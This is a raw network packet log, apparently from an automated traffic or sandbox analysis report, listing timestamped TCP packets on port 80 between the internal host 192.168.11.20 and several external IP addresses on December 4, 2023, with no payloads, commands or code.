                                                                                                                              Dec 4, 2023 15:23:40.651530981 CET8050144108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:40.651565075 CET8050144108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:40.651664019 CET5014480192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:40.651664019 CET5014480192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:40.651705027 CET8050144108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:40.652240992 CET5014480192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:41.907242060 CET5014480192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:42.922848940 CET5014580192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:43.040730953 CET8050145108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:43.040932894 CET5014580192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:43.041182995 CET5014580192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:43.158101082 CET8050145108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:43.289043903 CET8050145108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:43.289118052 CET8050145108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:43.289180994 CET8050145108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:43.289237976 CET8050145108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:43.289287090 CET8050145108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:43.289328098 CET8050145108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:43.289371014 CET8050145108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:43.289381027 CET5014580192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:43.289589882 CET5014580192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:44.547409058 CET5014580192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:45.562926054 CET5014680192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:45.680865049 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:45.681061029 CET5014680192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:45.682343006 CET5014680192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:45.682432890 CET5014680192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:45.799190044 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:45.799217939 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:45.799381971 CET5014680192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:45.799420118 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:45.799429893 CET5014680192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:45.799458027 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:45.799479961 CET5014680192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:45.799587965 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:45.799676895 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:45.799693108 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:45.799709082 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:45.799825907 CET5014680192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:45.800110102 CET5014680192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:45.800241947 CET5014680192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:45.916800022 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:45.916882992 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:45.916935921 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:45.917016029 CET5014680192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:45.917139053 CET5014680192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:45.917179108 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:45.917227030 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:45.917268038 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:45.917320967 CET5014680192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:45.917979956 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:45.918215990 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:46.034564018 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:46.034686089 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:46.034792900 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:46.035362005 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:46.036009073 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:46.036202908 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:46.155240059 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:46.155333042 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:46.155400991 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:46.155466080 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:46.155523062 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:46.155569077 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:46.155625105 CET8050146108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:46.155982971 CET5014680192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:47.187311888 CET5014680192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:48.202955961 CET5014780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:48.320298910 CET8050147108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:48.320878983 CET5014780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:48.320879936 CET5014780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:48.438163042 CET8050147108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:48.546039104 CET8050147108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:48.546116114 CET8050147108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:48.546531916 CET5014780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:48.546595097 CET5014780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:23:48.669440985 CET8050147108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:53.684990883 CET5014880192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:53.859375000 CET8050148198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:53.859745026 CET5014880192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:53.859838009 CET5014880192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:54.033523083 CET8050148198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:54.214494944 CET8050148198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:54.214580059 CET8050148198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:54.214792967 CET5014880192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:55.373035908 CET5014880192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:56.388911963 CET5014980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:56.563932896 CET8050149198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:56.564124107 CET5014980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:56.564327002 CET5014980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:56.749084949 CET8050149198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:56.872912884 CET8050149198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:56.872992039 CET8050149198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:56.873466015 CET5014980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:58.075597048 CET5014980192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.091171026 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.265394926 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.265748978 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.267030954 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.267204046 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.441657066 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.441705942 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.441838026 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.441865921 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.441873074 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.441937923 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.441996098 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.442158937 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.442169905 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.442287922 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.442413092 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.442502022 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.442671061 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.616220951 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.616301060 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.616473913 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.616556883 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.616703033 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.616775036 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.616823912 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.616873026 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.616918087 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.616974115 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.617157936 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:23:59.617214918 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.617393970 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.617512941 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.617861986 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.617974043 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.791529894 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.791610003 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.792005062 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.792668104 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.792757034 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.942840099 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.942903042 CET8050150198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:59.943077087 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:24:00.778176069 CET5015080192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:24:01.793750048 CET5015180192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:24:01.967715025 CET8050151198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:01.967901945 CET5015180192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:24:01.968038082 CET5015180192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:24:02.141629934 CET8050151198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:02.296098948 CET8050151198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:02.296180964 CET8050151198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:02.296538115 CET5015180192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:24:02.296734095 CET5015180192.168.11.20198.177.123.106
                                                                                                                              Dec 4, 2023 15:24:02.470036983 CET8050151198.177.123.106192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:07.426980019 CET5015280192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:07.593471050 CET8050152198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:07.593822956 CET5015280192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:07.593822956 CET5015280192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:07.760164976 CET8050152198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:07.760459900 CET8050152198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:07.760521889 CET8050152198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:07.760627985 CET5015280192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:09.104492903 CET5015280192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:10.120069027 CET5015380192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:10.286443949 CET8050153198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:10.286978960 CET5015380192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:10.287143946 CET5015380192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:10.453423023 CET8050153198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:10.453571081 CET8050153198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:10.453821898 CET8050153198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:10.454165936 CET5015380192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:11.791361094 CET5015380192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:12.806978941 CET5015480192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:12.973603964 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:12.973995924 CET5015480192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:12.975311995 CET5015480192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:13.141844034 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.141933918 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.141997099 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142056942 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142080069 CET5015480192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:13.142127037 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142205000 CET5015480192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:13.142210960 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142287970 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142340899 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142395973 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142396927 CET5015480192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:13.142472029 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142528057 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.142651081 CET5015480192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:13.142651081 CET5015480192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:13.308754921 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.308834076 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.308892965 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.308949947 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.309005976 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.309062958 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.310472965 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.310548067 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.310688972 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.310750008 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.310945034 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.311080933 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.311145067 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.311201096 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:13.311273098 CET8050154198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:15.493863106 CET5015580192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:15.660238028 CET8050155198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:15.660593033 CET5015580192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:15.660726070 CET5015580192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:15.828255892 CET8050155198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:15.828353882 CET8050155198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:15.828425884 CET8050155198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:15.828783989 CET5015580192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:15.828844070 CET5015580192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:24:15.995212078 CET8050155198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:21.049890995 CET5015680192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:21.232816935 CET805015691.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:21.233274937 CET5015680192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:21.233376980 CET5015680192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:21.417294979 CET805015691.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:21.417371988 CET805015691.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:21.417586088 CET5015680192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:22.742127895 CET5015680192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:23.757767916 CET5015780192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:23.939915895 CET805015791.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:23.940171957 CET5015780192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:23.940310001 CET5015780192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:24.122899055 CET805015791.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:24.122965097 CET805015791.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:24.123168945 CET5015780192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:25.444610119 CET5015780192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:26.460335016 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:26.642836094 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:26.643141031 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:26.644640923 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:26.644727945 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:26.827224970 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:26.827275991 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:26.827315092 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:26.827342033 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:26.827408075 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:26.827481985 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:26.827528954 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:26.827563047 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:26.827682972 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:26.827753067 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:26.827826977 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:26.827861071 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:26.827934027 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:26.828262091 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:26.868859053 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:26.869072914 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:27.009686947 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.009711027 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.009849072 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:27.009893894 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.010015965 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:27.010068893 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.010215044 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:27.010387897 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:27.010524988 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:27.010695934 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.010787964 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.010802984 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.010863066 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:27.010929108 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.010950089 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.011028051 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.011032104 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:27.011169910 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.011183977 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.011202097 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:27.011405945 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.011528969 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.011718988 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.011737108 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.011785030 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.051578045 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.051608086 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.192303896 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.192368031 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.192411900 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.193012953 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.193109035 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.193190098 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.193258047 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.193309069 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.193355083 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.193403959 CET805015891.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:27.193675995 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:28.147123098 CET5015880192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:29.162779093 CET5015980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:29.344999075 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.345289946 CET5015980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:29.345392942 CET5015980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:29.568372965 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.579713106 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.579822063 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.579911947 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.579967976 CET5015980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:29.580044985 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.580128908 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.580197096 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.580204964 CET5015980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:29.580279112 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.580342054 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.580351114 CET5015980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:29.580419064 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.580481052 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.580533028 CET5015980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:29.580614090 CET5015980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:29.763026953 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.763150930 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.763235092 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.763292074 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.763320923 CET5015980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:29.763389111 CET805015991.195.240.117192.168.11.20
